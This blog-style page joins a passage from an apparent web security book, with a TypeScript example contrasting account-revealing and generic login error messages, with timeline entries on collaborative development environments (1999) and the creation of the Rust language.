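A minimal sketch of the two approaches (hypothetical code, with a plain in-memory map standing in for a real credential store and password hashing) might look like this:

```typescript
// Hypothetical login check illustrating the trade-off described above.
// The in-memory user "store" and plain-text password are stand-ins for a
// real database lookup and password hash comparison.
const users = new Map<string, string>([
  ["alice@example.com", "correct horse battery staple"],
]);

// Leaky: distinct messages confirm which email addresses have accounts,
// letting an attacker enumerate users before brute forcing passwords.
function loginLeaky(email: string, password: string): string {
  if (!users.has(email)) return "No account exists for that email address.";
  if (users.get(email) !== password) return "Incorrect password.";
  return "OK";
}

// Generic: both failure modes return the same message, giving up less
// information at some cost to usability.
function loginGeneric(email: string, password: string): string {
  const valid = users.get(email) === password;
  return valid ? "OK" : "Invalid email or password.";
}

console.log(loginLeaky("bob@example.com", "guess"));   // reveals that no such account exists
console.log(loginGeneric("bob@example.com", "guess")); // reveals nothing about the account
```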

This is a great example of a trade-off that can be made for improved application security, but at the cost of reduced usability. This should give you an idea of the type of trade-offs that are discussed in Part III of this book.

This part of the book is extremely important for any security engineer who wants to beef up their skills, or any software engineer looking at transitioning to a security engineering role. The information presented here will help in architecting and writing more secure applications.

As in Part II, understanding how an application’s security can be improved is a valuable asset for any type of hacker. This is because while routine defenses can often be easily bypassed, more complex defenses require deeper understanding and knowledge to bypass. This is further evidence as to why I suggest reading the book from start to finish.

Although some parts of this book may give you more valuable learning than others, depending on your goals, I doubt any of it will be wasted. Cross-training of this sort is particularly valuable, as each part of the book is just another perspective on the same puzzle.

Categories
History Software Engineering

Collaborative Programming and Software Development – 1999 AD

Return to Timeline of the History of Computers

1999

Collaborative Software Development

“Despite the reputation of software developers as solitary, introverted people, much of their time is spent socializing and collaborating with colleagues and like-skilled experts to solve common problems or work on common projects. By the late 1990s, a combination of factors led to the emergence of collaborative development environments (CDEs), wherein geographically dispersed developers, some connected by corporations, others simply by challenges, would collaborate in virtual space using a variety of features to advance open source projects and develop code.

As software development efforts for web-based platforms grew, so did the need for greater productivity and innovation in meeting the growing demands of these systems and their ever-changing requirements. CDEs evolved in part to meet these demands and to help coders realize the network effects of leveraging expertise and social engagement beyond one’s own community or organization. The company that led the charge in this era was SourceForge®, a free service for software developers to manage their code development that came on the scene in 1999. A number of other platforms entered the market soon after.

Collaborative software development has dramatically accelerated the pace of developing open source projects. Without these capabilities, the rate of evolution would have been much slower, and without the benefit of as many perspectives and diverse inputs, the quality would not be nearly so high. One example of this is the Apache Software Foundation’s big data software stack, including Hadoop, Apache Spark, and others—which was collaboratively developed by programmers at dozens of different corporations and universities. In large part, the success and vibrancy of these projects is measured not just by their adoption but also by the number of active developers who are improving the code base.

Over time, CDEs incorporated additional features into their platforms beyond simple version control, including threaded discussion forums, calendaring and scheduling, electronic document routing and workflow, project dashboards, and configuration control of shared artifacts, among others.”

SEE ALSO: GNU Manifesto (1985), Wikipedia (2001)

Services like SourceForge and GitHub make it possible for many people to work on the same piece of software at the same time, dramatically increasing the rate of software innovation.

Fair Use Sources: B07C2NQSPV

Brown, A. W., and Grady Booch. “Collaborative Development Environments.” Advances in Computers 53 (June 2003): 1–29.

Categories
History Software Engineering

Rust Programming Language Invented by Graydon Hoare of Mozilla – 2010 AD

Return to Timeline of the History of Computers

Graydon Hoare started development of the Rust programming language around 2010. After contributions from hundreds of people, it was officially released as version 1.0.0 alpha by Mozilla Research on January 9, 2015.

Rust is a multi-paradigm programming language designed for performance and safety, especially safe concurrency.[16][17] Rust is syntactically similar to C++,[18] but can guarantee memory safety by using a borrow checker to validate references.[19] Rust achieves memory safety without garbage collection, and reference counting is optional.[20][21]

Rust was originally designed by Graydon Hoare at Mozilla Research, with contributions from Dave Herman, Brendan Eich, and others.[22][23] The designers refined the language while writing the Servo layout or browser engine,[24] and the Rust compiler. It has gained increasing use in industry, and Microsoft has been experimenting with the language for secure and safety-critical software components.[25][26]

Rust has been voted the “most loved programming language” in the Stack Overflow Developer Survey every year since 2016.[27]

Fair Use Sources: